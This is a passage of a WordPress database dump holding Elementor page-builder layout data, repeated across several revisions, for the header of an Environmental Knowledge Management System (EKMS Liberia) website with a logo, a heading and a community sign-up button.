"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd856c0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"aeac97c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4a7222f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":15.19500000000000028421709430404007434844970703125},\"elements\":[],\"isInner\":false},{\"id\":\"8554b23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":84.76699999999999590727384202182292938232421875},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19957,2923,'_elementor_version','2.7.5'),(19958,2923,'_elementor_template_type','wp-post'),(19961,2924,'_wp_page_template','elementor_canvas'),(19962,2924,'_elementor_edit_mode','builder'),(19963,2924,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":10.7750000000000003552713678800500929355621337890625,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":70.292000000000001591615728102624416351318359375,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge<br> Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto Slab\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(0,0,0,0.3)\"},\"typography_line_height\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4fca764\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":20.032000000000000028421709430404007434844970703125},\"elements\":[{\"id\":\"9491976\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Join Us to help grow the EKMS Community\",\"align\":\"center\",\"text_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9096130\",\"elType\":\"widget\",\"settings\":{\"text\":\"Sign up, It\'s Free!\",\"link\":{\"url\":\"https:\\/\\/ekms-liberia.mn.co\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#006400\",\"background_color\":\"rgba(0,0,0,0)\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#006400\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"rgba(1,68,33,0.64)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd856c0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"aeac97c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4a7222f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":15.19500000000000028421709430404007434844970703125},\"elements\":[],\"isInner\":false},{\"id\":\"8554b23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":84.76699999999999590727384202182292938232421875},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19964,2924,'_elementor_version','2.7.5'),(19965,2924,'_elementor_template_type','wp-post'),(19970,2925,'_wp_page_template','elementor_canvas'),(19971,2925,'_elementor_edit_mode','builder'),(19972,2925,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":10.7750000000000003552713678800500929355621337890625,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":72.173000000000001818989403545856475830078125,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge<br> Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto Slab\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(0,0,0,0.3)\"},\"typography_line_height\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4fca764\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":18.150999999999999801048033987171947956085205078125},\"elements\":[{\"id\":\"9491976\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Join Us to help grow the EKMS Community\",\"align\":\"center\",\"text_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9096130\",\"elType\":\"widget\",\"settings\":{\"text\":\"Sign up, It\'s Free!\",\"link\":{\"url\":\"https:\\/\\/ekms-liberia.mn.co\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#006400\",\"background_color\":\"rgba(0,0,0,0)\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#006400\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"rgba(1,68,33,0.64)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd856c0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"aeac97c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4a7222f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":15.19500000000000028421709430404007434844970703125},\"elements\":[],\"isInner\":false},{\"id\":\"8554b23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":84.76699999999999590727384202182292938232421875},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19973,2925,'_elementor_version','2.7.5'),(19974,2925,'_elementor_template_type','wp-post'),(19978,2926,'_wp_page_template','elementor_canvas'),(19979,2926,'_elementor_edit_mode','builder');
INSERT INTO `wp_postmeta` VALUES (19980,2926,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":10.7750000000000003552713678800500929355621337890625,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":72.173000000000001818989403545856475830078125,\"_inline_size_tablet\":33.3299999999999982946974341757595539093017578125,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge<br> Management System\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto Slab\",\"text_shadow_text_shadow\":{\"horizontal\":16,\"vertical\":0,\"blur\":10,\"color\":\"rgba(0,0,0,0.3)\"},\"typography_line_height\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4fca764\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":18.150999999999999801048033987171947956085205078125},\"elements\":[{\"id\":\"9491976\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Join Us to help grow <br>the EKMS Community\",\"align\":\"center\",\"text_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_weight\":\"700\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9096130\",\"elType\":\"widget\",\"settings\":{\"text\":\"Sign up, It\'s Free!\",\"link\":{\"url\":\"https:\\/\\/ekms-liberia.mn.co\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#006400\",\"background_color\":\"rgba(0,0,0,0)\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#006400\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_color\":\"rgba(1,68,33,0.64)\",\"border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"v1n7qw8\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#006400\",\"css_classes\":\"owp-sticky\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"141d06c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1pi8vkg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"638cd9e\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"content_position\":\"middle\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"63323e9\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false}},\"elements\":[{\"id\":\"b19be90\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_tablet\":75},\"elements\":[{\"id\":\"9a4b4e9\",\"elType\":\"widget\",\"settings\":{\"navigation_position\":\"left\",\"navigation_position_mobile\":\"center\",\"navigation_typo_typography\":\"custom\",\"navigation_typo_font_size_tablet\":{\"unit\":\"px\",\"size\":11},\"navigation_typo_font_size_mobile\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"oew-nav\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd856c0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"aeac97c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4a7222f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":15.19500000000000028421709430404007434844970703125},\"elements\":[],\"isInner\":false},{\"id\":\"8554b23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":84.76699999999999590727384202182292938232421875},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19981,2926,'_elementor_version','2.7.5'),(19982,2926,'_elementor_template_type','wp-post'),(19984,30,'_elementor_controls_usage','a:7:{s:8:\"oew-logo\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:12:\"section_logo\";a:1:{s:15:\"position_mobile\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:7;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:2:{s:12:\"_inline_size\";i:7;s:19:\"_inline_size_tablet\";i:3;}}s:8:\"advanced\";a:1:{s:16:\"section_advanc